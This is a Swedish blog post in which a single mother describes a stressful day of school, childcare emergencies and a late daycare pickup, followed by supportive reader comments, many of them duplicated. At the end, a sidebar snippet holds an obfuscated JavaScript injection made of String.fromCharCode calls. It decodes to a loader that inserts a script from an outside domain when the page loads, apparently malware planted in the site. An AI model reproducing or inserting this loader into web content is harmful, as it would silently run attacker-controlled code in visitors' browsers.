Värdelös mamma?

 

OLYMPUS DIGITAL CAMERA

Hej fina! Vilken dag! Usch! Du kanske kan känna igen dig i en sån där känsla att man inte räcker till, till någon eller någonting.

Hur man än gör så är man otillräcklig.  Jag kan inte vara 100% med i skolan för att Lilleman och praktiska saker måste styras upp, jag kan inte vara 100% med Lilleman för att jag har grejer att ta ifatt från skolan (detta gäller idag, inte tidigare)

Jag lämnade Ludvig bland dom första barnen på dagis ca 06:30 imorse. Han kramade och pussade mig och sprang in till dom andra som hade kommit… TUR att han faktiskt älskar sitt dagis <3

jag körde direkt in till skolan. Stressad men i tid….

Idag har vi kört mycket praktiskt. testmetodik, praktisk träning där vi gård in i rollen och coachat varandra. En bildbomb ifrån skolan..

IMG_0815

OLYMPUS DIGITAL CAMERA

 

Att hoppa på utbildningen så kort efter konkursen blev min medicin. Någonting jag velat göra länge. Det fäll sig naturligt som en nystart och kunde inte kommit lägligare. Jag fungerar som bäst när jag har rutiner, struktur och någonting att fokusera på.

Men idag, idag kände jag mig kolossalt misslyckad på all plan! Utbildningen är rolig men grymt intensiv. Det kräver att man  övar, repeterar och pluggar i stort sett dygnet runt. Min tid räcker inte riktigt till.

Imorse lämnade jag Lilleman tidigt, bland dom första som jag skrev tidigare. Denna veckan har jag fått rodda om då en familjemedlem skulle kommit och bott med oss nu i helgen när det även då är skola. En sisådär 10 panik sms senare så har jag fortfarande inte löst någon barnvakt =( Där börjar jag bli stressad. Mitt dagis Kids 2 Home har en ”barnvakts tjänst” där man kan hyra in deras  vikarier för helger, kvällar osv. Perfekt har jag tyckt.

Men jag har aldrig satt mig in i hur det funkar. När jag bara har Ludvig varannan vecka så vill jag inte ha barnvakt….. Nu blev det med väldigt kort varsel som jag då med dagis hjälp fick lösa barnvakt för helgen medan jag är i skolan. TROTS att jag var ute i sen tid så lyckades dom lösa det TACK!

Nu kunde jag fokusera på skolan igen. Tills jag idag fick sms om att dagis var stängt imorgon. Men herregud! Hur har jag missat detta? Jo, för att jag på min to-to-ist har haft att be om ett nytt inlogg till dagis och månadsbrevet, då jag sedan ett par månader inte kaka komma in. Men har helt glömt bort detta! Klockan var efter lunch, och jag fick ännu en gång börja dra i alla trådar. Det är 100% närvaro i skolan, så missar man det så funkar det inte. Men då klev dagis in som en räddande ängel igen, och löste banvakts tjänsten trots ÄNNU kortare framförhållning (Hur det ens är möjligt)  

Hur som så har dom lyckats sätta in en vikarie igen, som kommer hem till oss kl 06:45 imorgon bitti. TACK snälla ni! <3 Tänka att dom både löst morgondagen OCH helgen för oss < DET är service det!!!!

Detta får jag sms om mellan lektionerna när jag då jagar mottagning för att se hur det  går. Sån tur jag hade nu. Förutom detta så har en sisådär 72 andra saker gått mindre bara just idag. men ibland blir det bara så.

Nåja,  När vi har sista rasten så larmar min app om köer. Så jag ber läraren om att få lämna ett par minuter tidigare. Det var muntlig repetion av det vi gjort så det gick bra 0)

Jag lämnad klassen och rusade ut till biilen. Stress hit och stress dit. SUCK! Mycket riktigt så fastande jag i trafiken. HELT Stopp bitvis. En sträcka som normalt sett brukar ta 30 min tog 1H 20 min! På två hjul gled jag in på dagis parkeringen med andan i halsen och för sent…

Åhhhhh! INTE idag! Jag rusar in på dagis där denna killen möter mig. Glad, och busig slängde han sig i famnen. ”mamma du är verkligen sist idag” – Ja, älskling, jag vet…. <3

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

Ledsen trött och stressad åkte vi hem. Hemma på parkeringen kramade jag honom och började gråta. Han frågade såklart varför. Jag förklarade att ibland, blir man bara för trött helt enkelt. Då skickar min granne sms, ”Jag gör pannkakor, kom och ät med oss”. Vi hade smsat tidigare under dagen gällande att dagis har stängt, och att jag missat det.USCH jag känner mig verkligen värdelös både som mamma och student… =/ 

-TACK Marie, kunde inte kommit lägligare! <3

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA
NU ligger Lilleman brevid mig och sover. Jag ska också sova nu. Behöver ladda om batterierna.. Kram och gonatt / My Martens

 

72 Komentarer

 1. Jag kan glädja dig med att detta är inget som sonen kommer att komma ihåg i framtiden. Mina barn är stora nu och de kommer knappt ihåg att de har gått på dagis. Jag vet själv hur stressad man kunde känna sig av de här lämningarna och hämtningarna på dagis när allt strulade. När allt brakar ihop och det blir köer etc så är det ju inget man kan göra mer än ringa dagis och ta ett djupt andetag. Du skulle ju också kunna se om du kunde hitta någon i din närhet som du litar på som skulle kunna hämta ut Ludvig från dagis om du blir sen.

 2. Hallå! Du är inte mer än människa och ibland blir allt fel. Ta hand om dig och din son ❤️. Du är inte ensam att känna så utan ibland blir det kaos på flera plan tyvärr. Oftast efteråt inser man att man gör sitt bästa och blir starkare av kaoset. Kram kram

  • Tack, det ska jag göra….. Mindre kaos på schemat är beställt i min vardag ? Det ÄE ett puzzel av få ihop vardagen som ensam ibland… MEN det går.. kram

 3. Kära mamma My, en sån dag du haft. Jag blev så stressad bara av att läsa om hur du haft det. Hoppas att du kan varva ner inombords resten av veckan. Kram.

 4. Jag kan glädja dig med att detta är inget som sonen kommer att komma ihåg i framtiden. Mina barn är stora nu och de kommer knappt ihåg att de har gått på dagis. Jag vet själv hur stressad man kunde känna sig av de här lämningarna och hämtningarna på dagis när allt strulade. När allt brakar ihop och det blir köer etc så är det ju inget man kan göra mer än ringa dagis och ta ett djupt andetag. Du skulle ju också kunna se om du kunde hitta någon i din närhet som du litar på som skulle kunna hämta ut Ludvig från dagis om du blir sen.

 5. Usch för sådana dagar… Tur att det fixade sig med barnvakt i alla fall! Stressen att hämta tidigt från fritids finns hos mig med. Det är en av anledningarna som gör att jag stannar kvar på mitt nuvarande jobb som är flexibelt och med oregelbundna tider… Sov gott och hoppas morgondagen blir lugnare!

 6. Hallå! Du är inte mer än människa och ibland blir allt fel. Ta hand om dig och din son ❤️. Du är inte ensam att känna så utan ibland blir det kaos på flera plan tyvärr. Oftast efteråt inser man att man gör sitt bästa och blir starkare av kaoset. Kram kram

  • Tack, det ska jag göra….. Mindre kaos på schemat är beställt i min vardag 😉 Det ÄE ett puzzel av få ihop vardagen som ensam ibland… MEN det går.. kram

 7. Ursäkta att jag frågar men med den ångestproblematik som du har så undrar jag varför du bloggar en sådan här dag när det varit så superstressigt? Att sladda in på 2 hjul låter inte heller så bra med tanke på dina tidigare förlorade körkort. Du måste ta hand om dig själv först. Läsare kommer långt ner på listan över viktiga människor. Andas så att du inte får bakslag.

  • Hej Eva! att skriva att jag ”sladdar in på två hjul” är inte bokstavligen talat, snarare en upplevelse av min känsla. Min bil har inte kapacitet att kar på två hjul, och jag skulle inte i närheten av dagis eller plats med andra människor köra som en tok. Men ett uttryck som skulle förmedla min känsla… Varför blogga en stressig dag? Ja, bloggen är min vardag, idag var inte vardagen på topp. Bloggen är mitt jobb. Jag har lovat att låta er följa både med och mittgång. Det är mig svaret på den frågan.. Med vänlig hälsning,

   • Jo jag förstår att det var ett uttryck för hur du kände det. När man läser detta inlägget så målar man ju upp en bild av hur din dag var. Jag upplevde det som att du körde i panik för att komma fort fram till dagis. Bloggen är din vardag men just den här dagen kändes lätt omänsklig med sådant intensivt pluggande och annat som gick snett. Det är då jag tänker för mig själv varför i hela friden blogga när du kunde lagt den tiden på att plugga. Stress är ju dock mindre bra när man har ångest. Det var bara mina tankar när jag läste. Har man haft ångest så är ju stresströseln för alltid lägre än den var innan.

 8. Kära mamma My, en sån dag du haft. Jag blev så stressad bara av att läsa om hur du haft det. Hoppas att du kan varva ner inombords resten av veckan. Kram.

 9. Usch för sådana dagar… Tur att det fixade sig med barnvakt i alla fall! Stressen att hämta tidigt från fritids finns hos mig med. Det är en av anledningarna som gör att jag stannar kvar på mitt nuvarande jobb som är flexibelt och med oregelbundna tider… Sov gott och hoppas morgondagen blir lugnare!

 10. Ursäkta att jag frågar men med den ångestproblematik som du har så undrar jag varför du bloggar en sådan här dag när det varit så superstressigt? Att sladda in på 2 hjul låter inte heller så bra med tanke på dina tidigare förlorade körkort. Du måste ta hand om dig själv först. Läsare kommer långt ner på listan över viktiga människor. Andas så att du inte får bakslag.

  • Hej Eva! att skriva att jag ”sladdar in på två hjul” är inte bokstavligen talat, snarare en upplevelse av min känsla. Min bil har inte kapacitet att kar på två hjul, och jag skulle inte i närheten av dagis eller plats med andra människor köra som en tok. Men ett uttryck som skulle förmedla min känsla… Varför blogga en stressig dag? Ja, bloggen är min vardag, idag var inte vardagen på topp. Bloggen är mitt jobb. Jag har lovat att låta er följa både med och mittgång. Det är mig svaret på den frågan.. Med vänlig hälsning,

   • Jo jag förstår att det var ett uttryck för hur du kände det. När man läser detta inlägget så målar man ju upp en bild av hur din dag var. Jag upplevde det som att du körde i panik för att komma fort fram till dagis. Bloggen är din vardag men just den här dagen kändes lätt omänsklig med sådant intensivt pluggande och annat som gick snett. Det är då jag tänker för mig själv varför i hela friden blogga när du kunde lagt den tiden på att plugga. Stress är ju dock mindre bra när man har ångest. Det var bara mina tankar när jag läste. Har man haft ångest så är ju stresströseln för alltid lägre än den var innan.

 11. Fy för såna dagar! Stress är ju oundvikligt och ibland blir det bara too much. Jag jobbade deltid när kidsen var små (hade den möjligheten vilket inte alla har) och hämtade alltid först. När min son skulle önska sig något på sin 5-års dag så var hans önskan att få bli hämtad sist ? Ja, vad säger man?! Han tyckte att dagarna var för korta och att han fick avbryts leken med kompisarna varje dag jag susade in på förskolan vid 13-tiden. Så ha inte dåligt samvete! Att bli hämtad sist har ingen tagit skada av. Fördelen är också att man får pedagogernas fulla uppmärksamhet oftast, då det inte är så många kvar. Du gör så gott du kan utefter de förutsättningar du har! Var inte så hård emot dig själv. Du är den allra bästa mannan för Ludvig och det är huvudsaken. Allt gott till dig fina My ❤️

 12. Hej My! Jag var ensamstående med 3 små barn för många år sedan, jag jobbade i vården
  och fick pussla med barnvakter hela tiden, ett tag hade jag barnflicka som som hjälpte mig, men det var ohållbart i längden eftersom jag inte hade så hög lön.
  Jag tycker att du är fantastisk mamma till din Lilleman.
  Kram<3

 13. Absolut inte en dålig mamma, snarare en mänsklig! Pengarna måste in så vad gör man? Däremot föräldrarna som vill ha sitt stora barn på dagis 40h/v och bara vara hemma med den nya bebisen kanske verkligen borde fundera på sina kvaliteer som föräldrar. Sån utvecklig är skrämmande tycker jag men det är ju en helt annan historia ? Var rädd om dig själv bara – jag klarar inte alls stress lika bra och länge som innan jag ”tog slut” även om man lätt ramlar ner i samma hjulspår. Tänk på att varva ner med <3

 14. Hej My!
  Det som är så bra med livet är att man kan planera hur man vill ha det i sitt liv. Jag förstår att du alltid är på gång, har mycket möten och annat, men det är bara du som kan förändra det. Med tanke på att du skriver en del om att du är stressad, det är mycket att göra, du känner dig inte tillräcklig som mamma, så kanske du ska tänka om och varva ner lite.
  Jag tycker tyvärr inte synd om dig då det är du som väljer hur dina dagar ska vara. För mig är det inte normalt att vara på 24/7. Tagga ner och njut lite mer av att bara vara i här och nu, det är som balsam för en stressad själ…

 15. Du är absolut inte en dålig mamma, vissa dagar tickar bara klockan iväg och det kan man inte göra något åt. Du är en alldeles superbra mamma, kom ihåg det!
  Jag frågade min yngste son en gång vad det värsta han minns från det han va liten, t.ex äta den mat som ställdes fram, tvingad att städa sitt rum m.m. Hans svar blev: att jag som mamma städade jämt!!
  Kram o ha en fin fredag

 16. Fy för såna dagar! Stress är ju oundvikligt och ibland blir det bara too much. Jag jobbade deltid när kidsen var små (hade den möjligheten vilket inte alla har) och hämtade alltid först. När min son skulle önska sig något på sin 5-års dag så var hans önskan att få bli hämtad sist 😂 Ja, vad säger man?! Han tyckte att dagarna var för korta och att han fick avbryts leken med kompisarna varje dag jag susade in på förskolan vid 13-tiden. Så ha inte dåligt samvete! Att bli hämtad sist har ingen tagit skada av. Fördelen är också att man får pedagogernas fulla uppmärksamhet oftast, då det inte är så många kvar. Du gör så gott du kan utefter de förutsättningar du har! Var inte så hård emot dig själv. Du är den allra bästa mannan för Ludvig och det är huvudsaken. Allt gott till dig fina My ❤️

 17. Hej My! Jag var ensamstående med 3 små barn för många år sedan, jag jobbade i vården
  och fick pussla med barnvakter hela tiden, ett tag hade jag barnflicka som som hjälpte mig, men det var ohållbart i längden eftersom jag inte hade så hög lön.
  Jag tycker att du är fantastisk mamma till din Lilleman.
  Kram<3

 18. Absolut inte en dålig mamma, snarare en mänsklig! Pengarna måste in så vad gör man? Däremot föräldrarna som vill ha sitt stora barn på dagis 40h/v och bara vara hemma med den nya bebisen kanske verkligen borde fundera på sina kvaliteer som föräldrar. Sån utvecklig är skrämmande tycker jag men det är ju en helt annan historia 🙂 Var rädd om dig själv bara – jag klarar inte alls stress lika bra och länge som innan jag ”tog slut” även om man lätt ramlar ner i samma hjulspår. Tänk på att varva ner med <3

 19. Men oj fina människa!! Vilken dag, vilken stressig dag och vilken grymt bra mamma du är!! Att du försöker, att du anstränger dig, att du trixar och mixar visar BARA på vilken jättebra mamma du faktiskt är. Du försöker ju få en bra utbildning nu när du har chansen, att offra ”lite” i livet är en investering även för sonen, för det kommer att bli bra i framtiden, lovar. <3
  Du har bästa grannen verkligen!
  Idag är det en ny dag, nya tag och andas, glöm inte att andas, vila när du kan, ta dina vitaminer för att orka och kunna koncentrera dig, ÄT RÄTT och bra för att må bra och motverka att stressen krossar dig längre fram. Stor kram nu och nya tag idag. ?

 20. Så har nog alla det ibland ? Men du är absolut ingen dålig mamma !
  Ludvig ser så härlig ut på bilderna ? Ser ut som om han älskar att spexa framför kameran ?
  Hoppas att den blir en något lugnare dag för dig idag. Kram ?

  • OJ, Emma du hade nog svalt en taggtråd eker så. Nej, jag förmedlade bara att jag hade haft en rikta s*it dag! Som jag tror att många andra mammor kan känna igen sig i. Ibland händer det mig också. Jag valde att dela med mig av den.. ”tagga ner” Ja, det hade jag gjort om jag kunnat! hehe! ? Nu handlar det bara om att ”hålla ihop” och få livspusslet att funka även dom gångerna som det inte riktigt blivit som man har planerat… Ha en trevlig helg=)

 21. Hej My!
  Det som är så bra med livet är att man kan planera hur man vill ha det i sitt liv. Jag förstår att du alltid är på gång, har mycket möten och annat, men det är bara du som kan förändra det. Med tanke på att du skriver en del om att du är stressad, det är mycket att göra, du känner dig inte tillräcklig som mamma, så kanske du ska tänka om och varva ner lite.
  Jag tycker tyvärr inte synd om dig då det är du som väljer hur dina dagar ska vara. För mig är det inte normalt att vara på 24/7. Tagga ner och njut lite mer av att bara vara i här och nu, det är som balsam för en stressad själ…

 22. Du är absolut inte en dålig mamma, vissa dagar tickar bara klockan iväg och det kan man inte göra något åt. Du är en alldeles superbra mamma, kom ihåg det!
  Jag frågade min yngste son en gång vad det värsta han minns från det han va liten, t.ex äta den mat som ställdes fram, tvingad att städa sitt rum m.m. Hans svar blev: att jag som mamma städade jämt!!
  Kram o ha en fin fredag

 23. När jag har dessa dagar brukar jag tänka att jag i alla fall alltid tänker på barnen först och främst. Det finns så många barn här i världen där föräldrarna bara tänker på sig själva, barn utan tak över huvudet och mat för dagen. Där ingen älskar dem utan de används som arbetskraft redan som barn.
  Sen när jag tänkt så ger jag mina barn en stor kram och puss och säger om och om att jag älskar dem. Och för dem kommer jag alltid att vara den bästa mamman, för jag gör mitt bästa och det är bra nog ♥

 24. My så här är det att vara ensamstående mamma i ett nötskal, förut fanns det en förening som hette ”enastående föräldrar” o som riktade sig till just ensamstående. Ensamstående mamma som du är med allt vad det innebär o helt ensam med allt ansvar det ska du verkligen hyllas för o samtidigt plugga, det skulle inte många klara av. Ludvig kommer inte ens att komma ihåg knappt att han gått på dagis för den perioden i livet glömmer de bort, mina flickor minns knappt heller att de gått på dagis. Fortfarande äger du ett fantastiskt ordförråd, hög nivå på din kompetens My, som jag sagt innan, du skulle också haft förutsättningar att bli journalist. Du är bästa o gulligaste mamman ett barn kan ha.

 25. Men oj fina människa!! Vilken dag, vilken stressig dag och vilken grymt bra mamma du är!! Att du försöker, att du anstränger dig, att du trixar och mixar visar BARA på vilken jättebra mamma du faktiskt är. Du försöker ju få en bra utbildning nu när du har chansen, att offra ”lite” i livet är en investering även för sonen, för det kommer att bli bra i framtiden, lovar. <3
  Du har bästa grannen verkligen!
  Idag är det en ny dag, nya tag och andas, glöm inte att andas, vila när du kan, ta dina vitaminer för att orka och kunna koncentrera dig, ÄT RÄTT och bra för att må bra och motverka att stressen krossar dig längre fram. Stor kram nu och nya tag idag. 😀

 26. Så har nog alla det ibland 😄 Men du är absolut ingen dålig mamma !
  Ludvig ser så härlig ut på bilderna 😄 Ser ut som om han älskar att spexa framför kameran 😄
  Hoppas att den blir en något lugnare dag för dig idag. Kram 😄

  • OJ, Emma du hade nog svalt en taggtråd eker så. Nej, jag förmedlade bara att jag hade haft en rikta s*it dag! Som jag tror att många andra mammor kan känna igen sig i. Ibland händer det mig också. Jag valde att dela med mig av den.. ”tagga ner” Ja, det hade jag gjort om jag kunnat! hehe! 😉 Nu handlar det bara om att ”hålla ihop” och få livspusslet att funka även dom gångerna som det inte riktigt blivit som man har planerat… Ha en trevlig helg=)

 27. När jag har dessa dagar brukar jag tänka att jag i alla fall alltid tänker på barnen först och främst. Det finns så många barn här i världen där föräldrarna bara tänker på sig själva, barn utan tak över huvudet och mat för dagen. Där ingen älskar dem utan de används som arbetskraft redan som barn.

  Sen när jag tänkt så ger jag mina barn en stor kram och puss och säger om och om att jag älskar dem. Och för dem kommer jag alltid att vara den bästa mamman, för jag gör mitt bästa och det är bra nog ♥

 28. My så här är det att vara ensamstående mamma i ett nötskal, förut fanns det en förening som hette ”enastående föräldrar” o som riktade sig till just ensamstående. Ensamstående mamma som du är med allt vad det innebär o helt ensam med allt ansvar det ska du verkligen hyllas för o samtidigt plugga, det skulle inte många klara av. Ludvig kommer inte ens att komma ihåg knappt att han gått på dagis för den perioden i livet glömmer de bort, mina flickor minns knappt heller att de gått på dagis. Fortfarande äger du ett fantastiskt ordförråd, hög nivå på din kompetens My, som jag sagt innan, du skulle också haft förutsättningar att bli journalist. Du är bästa o gulligaste mamman ett barn kan ha.

 29. Jag beundrar er föräldrar som får ihop ert livspussel sådana här dagar!! Själv har jag inga barn och tycker ibland att tiden på morgonen inte räcker till…..Så du ska vara stolt över allt som du gör för dig och dina underbara lilla kille. Hoppas ni får en underbar helg! STOR KRAM

 30. Jag beundrar er föräldrar som får ihop ert livspussel sådana här dagar!! Själv har jag inga barn och tycker ibland att tiden på morgonen inte räcker till…..Så du ska vara stolt över allt som du gör för dig och dina underbara lilla kille. Hoppas ni får en underbar helg! STOR KRAM

 31. Sluta ha dåligt samvete. Ditt barn har det bra på förskolan. Det är utbildad personal där som tar hand om honom som det låter gör det väldigt bra. Han mår inte dåligt av att vara där många timmar.

 32. Förstår om du vill ha din son hos dig men med tanke på att han ska tillbringa större delen av tiden hos dig denna veckan på förskolan så borde han kanske stannat hos sin pappa. Så tänker jag och du får gärna tycka att det är fel. Men att både lämna först och hämta sist hade jag valt bort för barnens skull..

  • Här handlar det nog inte om rätt eller fel. hans pappa jobbar också lååååånga sågar så våra schema ser ut i stort sett det samma. Men det handlar nog snarare om att föröka att hålla sig till dom tutoner vi under 5.5 år byggt upp anpassat och ratat oss efter. Skolama är en tillfälle period som eder tiolo mer jobb inom mitt företag. jag förstår vad su säger, jag säger inte emot… men jag ser det på ett annat sätt =)

 33. Sluta ha dåligt samvete. Ditt barn har det bra på förskolan. Det är utbildad personal där som tar hand om honom som det låter gör det väldigt bra. Han mår inte dåligt av att vara där många timmar.

 34. Förstår om du vill ha din son hos dig men med tanke på att han ska tillbringa större delen av tiden hos dig denna veckan på förskolan så borde han kanske stannat hos sin pappa. Så tänker jag och du får gärna tycka att det är fel. Men att både lämna först och hämta sist hade jag valt bort för barnens skull..

  • Här handlar det nog inte om rätt eller fel. hans pappa jobbar också lååååånga sågar så våra schema ser ut i stort sett det samma. Men det handlar nog snarare om att föröka att hålla sig till dom tutoner vi under 5.5 år byggt upp anpassat och ratat oss efter. Skolama är en tillfälle period som eder tiolo mer jobb inom mitt företag. jag förstår vad su säger, jag säger inte emot… men jag ser det på ett annat sätt =)

 35. My, DU är absolut inte en ”dålig mamma”! Det har du visat flera ggr, din omtanke om Ludvig skiner alltid igenom, det är honom du sätter främst, och det märks! Han verkar vara trygg, glad, modig, klok… och det är tack vare dig.
  Det låter toppen att förskolan även har barnvakts-tjänst, suveränt att de kunde lösa ditt dilemma, vilken lättnad + att Ludvig får umgås med någon han känner igen (antar att han träffat vikarien på förskolan)
  Ta nu ett par djupa andetag, o låt stressen flyga sin kos ?
  Stor kram till dig! PS Du är även väldigt bra på att svara på ”dumma” el ”ifrågasättande” kommentarer, med lugn och vänlighet. Det vinner du på!

 36. My, DU är absolut inte en ”dålig mamma”! Det har du visat flera ggr, din omtanke om Ludvig skiner alltid igenom, det är honom du sätter främst, och det märks! Han verkar vara trygg, glad, modig, klok… och det är tack vare dig.
  Det låter toppen att förskolan även har barnvakts-tjänst, suveränt att de kunde lösa ditt dilemma, vilken lättnad + att Ludvig får umgås med någon han känner igen (antar att han träffat vikarien på förskolan)
  Ta nu ett par djupa andetag, o låt stressen flyga sin kos 🙂
  Stor kram till dig! PS Du är även väldigt bra på att svara på ”dumma” el ”ifrågasättande” kommentarer, med lugn och vänlighet. Det vinner du på!

 37. Å härliga My!
  Jag har skrivit här tidigare:)Jag kan lova dig att din son kommer inte ha ett minne av detta,alla har vi våra skitdagar:) Jag levde själv länge med min idag 13 åriga son. Var eviga dag släpade jag upp honom 06.00 för att lämna 06.30 på dagis:)Han började flyga varannan helg till Sthlm när han var 6 år. Idag är han världens tryggaste,modigaste och självständigaste kille fast fortfarande otroligt mammig,när jag påminner honom om förr,skrattar han bara. Det är ett kvitto på att man lyckats! Ensam är stark! Jag vet att din fina son kommer få samma fina egenskaper! Tro mig!!! Jag är så nöjd idag över att det blev som det blev,även om man ständigt slogs mot samvetet,men idag förstår jag hur älskad jag är av min son.
  Kram bästa My!

 38. Å härliga My!
  Jag har skrivit här tidigare:)Jag kan lova dig att din son kommer inte ha ett minne av detta,alla har vi våra skitdagar:) Jag levde själv länge med min idag 13 åriga son. Var eviga dag släpade jag upp honom 06.00 för att lämna 06.30 på dagis:)Han började flyga varannan helg till Sthlm när han var 6 år. Idag är han världens tryggaste,modigaste och självständigaste kille fast fortfarande otroligt mammig,när jag påminner honom om förr,skrattar han bara. Det är ett kvitto på att man lyckats! Ensam är stark! Jag vet att din fina son kommer få samma fina egenskaper! Tro mig!!! Jag är så nöjd idag över att det blev som det blev,även om man ständigt slogs mot samvetet,men idag förstår jag hur älskad jag är av min son.
  Kram bästa My!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/